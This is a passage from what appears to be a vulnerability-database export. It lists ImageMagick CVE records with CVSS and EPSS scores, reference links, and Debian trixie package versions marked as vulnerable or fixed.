url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2379948
reference_id	2379948
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2379948

reference_url

https://github.com/advisories/GHSA-vmhh-8rxq-fp9g

reference_id

GHSA-vmhh-8rxq-fp9g

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-vmhh-8rxq-fp9g

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.47%2Bdfsg1-2?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.47%2Bdfsg1-2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.47%252Bdfsg1-2%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2025-53015, GHSA-vmhh-8rxq-fp9g

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6t7d-2hre-sqbw

url VCID-7cbm-nm6u-8kdp

vulnerability_id VCID-7cbm-nm6u-8kdp

summary ImageMagick: out-of-bounds read in enhance.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-6520.json

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2016-6520.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2016-6520

reference_id

reference_type

scores

value	0.03417
scoring_system	epss
scoring_elements	0.87392
published_at	2026-04-01T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87403
published_at	2026-04-02T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87417
published_at	2026-04-04T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87416
published_at	2026-04-07T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87434
published_at	2026-04-08T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87442
published_at	2026-04-09T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87453
published_at	2026-04-11T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87449
published_at	2026-04-12T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87445
published_at	2026-04-13T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87459
published_at	2026-04-21T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87462
published_at	2026-04-18T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87475
published_at	2026-04-24T12:55:00Z

value	0.03417
scoring_system	epss
scoring_elements	0.87482
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2016-6520

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1364357
reference_id	1364357
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1364357

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2016-6520

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7cbm-nm6u-8kdp

url VCID-7f35-ha1p-bbby

vulnerability_id VCID-7f35-ha1p-bbby

summary ImageMagick: heap-based buffer overflow in TIFFGetProfiles in coders/tiff.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25667.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25667.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2020-25667

reference_id

reference_type

scores

value	0.00108
scoring_system	epss
scoring_elements	0.29066
published_at	2026-04-01T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29141
published_at	2026-04-02T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.2919
published_at	2026-04-04T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29
published_at	2026-04-07T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29064
published_at	2026-04-08T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29106
published_at	2026-04-09T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29112
published_at	2026-04-11T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29068
published_at	2026-04-12T12:55:00Z

value	0.00108
scoring_system	epss
scoring_elements	0.29017
published_at	2026-04-13T12:55:00Z

value	0.00157
scoring_system	epss
scoring_elements	0.3651
published_at	2026-04-16T12:55:00Z

value	0.00157
scoring_system	epss
scoring_elements	0.36493
published_at	2026-04-18T12:55:00Z

value	0.00157
scoring_system	epss
scoring_elements	0.36437
published_at	2026-04-21T12:55:00Z

value	0.00157
scoring_system	epss
scoring_elements	0.36209
published_at	2026-04-24T12:55:00Z

value	0.00157
scoring_system	epss
scoring_elements	0.36178
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2020-25667

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1891613
reference_id	1891613
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1891613

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2020-25667

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7f35-ha1p-bbby

url VCID-8bac-p2pq-vkf1

vulnerability_id VCID-8bac-p2pq-vkf1

summary Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-2719.json

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-2719.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2022-2719

reference_id

reference_type

scores

value	0.00026
scoring_system	epss
scoring_elements	0.0719
published_at	2026-04-18T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07283
published_at	2026-04-26T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07265
published_at	2026-04-13T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07196
published_at	2026-04-16T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07317
published_at	2026-04-21T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07234
published_at	2026-04-04T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07212
published_at	2026-04-07T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07267
published_at	2026-04-08T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07294
published_at	2026-04-09T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.0729
published_at	2026-04-11T12:55:00Z

value	0.00026
scoring_system	epss
scoring_elements	0.07276
published_at	2026-04-24T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2022-2719

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://bugzilla.redhat.com/show_bug.cgi?id=2116537

reference_id

2116537
